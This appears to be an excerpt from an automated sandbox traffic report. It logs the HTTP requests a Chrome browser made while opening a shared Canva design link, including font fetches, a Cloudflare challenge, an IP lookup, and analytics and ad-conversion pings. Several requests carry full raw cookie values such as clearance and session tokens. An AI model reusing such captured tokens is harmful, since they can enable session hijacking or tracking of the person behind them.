__cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
    Source: global trafficHTTP traffic detected: GET /YACgEZ1cb1Q/0/ArimoBoldItalic.08fb930e5cf38bab811efa91.1060345c54d396e76d73f1da7ee200bd.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YACgEZ1cb1Q/0/ArimoItalic.fa87472a877e70c5bce22e42be5c.d257a7100844bc3f98c9021168b6249e.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YACgEZ1cb1Q/0/ArimoBold.927b7dca5b947f69cb8e835f7f743d.98c4d2c0223fc8474641c77f923528e9.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/8f4a79db8e0a727a HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a","ts":1734643651404,"utm_s":"uniquelinks","utm_m":"link2"}
    Source: global trafficHTTP traffic detected: GET /site-insights.js HTTP/1.1Host: cdn.metadata.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pixel/config/1721.json HTTP/1.1Host: cdn.metadata.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /site-insights.js HTTP/1.1Host: cdn.metadata.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=187599-187599If-Range: "654ba7fa32ccfd8c24e11f29b7156a34"
    Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a","ts":1734643651404,"utm_s":"uniquelinks","utm_m":"link2"}; Metadata_visitor_id=m4vu1ljwisbrprgjbso; Metadata_session_id=m4vu1ljx4jdkqcpbcgc
    Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514845&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=loaded&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=a%20page&ep.custom_doctype_id=TAFJi5FXMSs&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&up.custom_country_code=US&tfd=18006&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; _ga=GA1.1.2124219403.1734643655
    Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514863&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engagement&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_doctype_id=TAFJi5FXMSs&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&_et=4&tfd=18022&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.canva.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570
    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pixel/config/1721.json HTTP/1.1Host: cdn.metadata.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YACgEZ1cb1Q/0/Arimo.7ac02a544211773d9636e056e9da6c35.7.f8f199f09526f79e87644ed227e0f651.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=187599-194187If-Range: "654ba7fa32ccfd8c24e11f29b7156a34"
    Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471z8812729902za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1734643647572&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_173464376514863&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engagement&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_doctype_id=TAFJi5FXMSs&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&_et=4&tfd=18022&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=CEzz%2BzYwahaIt5v168ErcRhEArlc8rqNzSzYP6PT3%2B1RpLkb%2FhQGUjBImUq33uceeeZR4CuicX8bhud0H4M3dnub114H%2FOCjl5%2BISM9wCKXFmuJxeFLOK97PuKYGUQ%3D%3D
    Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /activity;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
